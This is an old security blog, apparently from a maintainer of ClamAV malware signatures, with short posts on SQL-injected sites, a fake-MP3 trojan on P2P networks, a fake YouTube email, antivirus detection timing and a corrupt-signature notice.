Amazon3

Amazon

Tuesday, 20 May 2008

SQL Injection: example blocked

There's still a huge amount of SQL injected sites still out there (list of serving sites)

For example:











Looking at the html for the site, you can see the .js file, added inside the TITLE html code:






If you are using clarkconnect (or other ClamAV based web-filtering) the latest update to the SaneSecurity signatures should help block the current sites:













Signature(s):

Email.Malware.Sanesecurity.08051902.SQLInj (generic)
Email.Malware.Sanesecurity.08052000.SQLInj (generic)
Email.Malware.Sanesecurity.08052001.SQLInj (generic)
Email.Malware.Sanesecurity.08052002.SQLInj (generic)
Email.Malware.Sanesecurity.08052003.SQLInj (generic)
Email.Malware.Sanesecurity.Url.SQLInj_xx
Posted by at No comments:

Wednesday, 7 May 2008

Rogue MP3 Trojan streaks across P2P networks

Hopefully people have seen this.. but it's worth posting:


Hundreds of thousands of examples of a new Trojan that poses as a media file have flooded onto P2P networks.

Since Friday 2 May more than half a million instances of the Trojan have been detected on consumer PCs, according to net security firm McAfee. The anti-virus firm reports the spread of the Downloader-UA.h Trojan as the most significant malware outbreak in the last three years.

Source: TheRegister
Source: Mcafee

What's interesting about this, is that I came across this "new" idea from a post by ISS (dated 29th April), which you can see here

While the above post talked about .ASF files, all the bad-guys have done is rename the .asf files to .mp3... Windows Media Player just reads Metadata in the header and runs the script :(

SaneSecurity ClamAV Generic detection was added on 30th April 2008 for this new idea and so I was interested to find that these "new" mp3s McAfee are talking about, are found using the same generic signature :)

Eg: eview-T-3545425-turbanlporno.mp3: Email.Malware.Sanesecurity.08043001.WmaScript FOUND

Note: You must be using ClamAV v0.93 to be able to detect this
Posted by at No comments:

Monday, 12 November 2007

Fake YouTube email spammed

Interesting YouTube email has just been spammed:















As you can see from the link, it's a fake YouTube site, which takes you here:












Current VirusTotal detection for the install_flash_player.exe file:














Email detected as: Email.Malware.Sanesecurity.07111200
Posted by at 1 comment:

Friday, 5 October 2007

0hour testing

Well, a new email came in, which looked very odd, here's the headers:

Return-Path:
Received: from 88-139-180-230.adslgp.cegetel.xxx (88-139-180-230.adslgp.cegetel.
by raq0402.keele.netcentral.co.xx (8.9.3/8.9.3) with ESMTP id JAA02419
for ; Fri, 5 Oct 2007 09:28:25 +0100
Received: from [88.139.180.230] by mx2.servershost.xxx; Fri, 5 Oct 2007 02:37:20
From: "Shirley Xxxxxxx"
Date: Fri, 5 Oct 2007 02:37:20 +0100

Here's the actual email:














So, I submitted the zip file to VirusTotal to see what the latest detection was like and then repeated the same file, at various times after that, to see roughly when vendors added detection.

Note: it's not exactly scientific, so your mileage may vary etc.

Here's the results:

As you can see, Antivir did well!






















ClamAV team did a very quick job on adding this one, still beating the big boys:











































F-Secure and F-Prot, now have detection:



















Nod32 users now covered:















Kaspersky users now covered:















For the AVG users out there, detection has now been added:

















Here's the situation on Monday morning:

Posted by at No comments:

Wednesday, 19 September 2007

SaneSecurity News: Corrupt Signatures

For a few hours today, one of the mirrors had a corrupt version of phish.ndb.gz.

After being alerted to the fact by a user, I informed the mirror admin about the issue and the problem was then fixed.

The scripts on the SaneSecurity site, check the integrity of the signatures before being moved into the ClamAV database directory for use... and have done for some time.

This is important not only for the SaneSecurity signatures but indeed for any Third-Party signatures, as if you move a corrupt signature file into the ClamAV directory, it's going to stop ClamAV from scanning your emails, until you sort the problem out.

If you're running your own script or have an old version of the SaneSecurity scripts, it might be worth updating them:

http://sanesecurity.co.uk/clamav/usage.htm

I do always check signature integrity before uploading... so they leave here fine... but the end-user must always double-check their download integrity before use.

Apologies for the corrupt file and any problems caused.

Cheers,

Steve
Posted by at 1 comment:
Subscribe to: Posts (Atom)